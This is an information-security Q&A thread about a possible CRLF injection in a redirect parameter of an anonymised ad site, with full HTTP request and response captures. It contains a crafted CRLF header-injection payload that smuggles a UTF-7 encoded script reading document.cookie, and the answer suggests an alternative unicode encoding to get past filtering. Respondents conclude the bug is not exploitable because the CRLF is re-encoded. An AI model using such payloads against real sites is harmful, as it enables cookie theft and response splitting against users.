# How to exploit CRLF Injection?

Tags: web-application, xss, web-service, injection

I was running a few tests on a website when I came across this:

Request:

```
GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=format%3Dhtml HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0
```

When forwarded, the response looked like this:

```
HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard>redirected</a>.</body></html>
```

After a few hours of fiddling about with different parameters I think I found a CLRF injection within "intended_params=format%3Dhtml" parameter which changes the location header and redirection URL:

Request:

```
GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=%0d%0aContentType%3a%20text%2fhtml%3bcharset%3dUTF-7%0d%0aContent-Length%3a%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies%3a%27%2Bdocument%2ecookie%29%2BADw-%2fscript%2BAD4-%2BADw-%2fbody%2BAD4-%2BADw-%2fhtml%2BAD4 HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0
```

Response:

```
HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4">redirected</a>.</body></html>
```

Is this behaviour exploitable in anyway? can you use this to set cookie or cause HTTP Split Response?

Thanks in advance.

Comment: The CRLF are properly encoded with `%0D%0A` in the resulting URL; so it’s not exploitable.

Comment: And it got uppercased, so I would say it's decoded, and then reencoded in the final response URL parameter (a direct pass-through might be vulnerable to plain `\r\n`). Still, the charset value is concatenated to the parameter value, so technically, the `charset` params is `UTF-7\r\nContent-Length...` There might be something to try here

Answer (score 3):

As @Gumbo has said, CRLF are properly encoded with %0d%0a in the resulting URL, as you may see. If it had set headers as you had passed as parameters, you would have seen those headers separately. You may try different encoding instead, like **%E5%98%8A%E5%98%8D** :)

> The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

If you're able to split response, you can perform other exploits as defined [here](http://www.hpenterprisesecurity.com/vulncat/en/vulncat/php/header_manipulation.html). This explains what attacks one can perform if s/he is able to manipulate HTTP headers.

Headers are separated by one CRLF and the response's headers are separated from its body by two, allowing you to insert your own spoofed content.

Since the response is 302, however, it's very hard to exploit. Though, you may find the following interesting, please have a look.
http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
The author has managed to trigger XSS in IE, despite 302 redirect.

Comment: Welcome to the Information Security stack exchange! Please keep in mind that when adding links in your answer, you should always provide a summary of the content you link to in case the link expires, and you should always try to link to internal StackExchange pages first ([see here for why](http://meta.stackexchange.com/questions/8231/are-answers-that-just-contain-links-elsewhere-really-good-answers)). Also, do have a look at the [answer] page!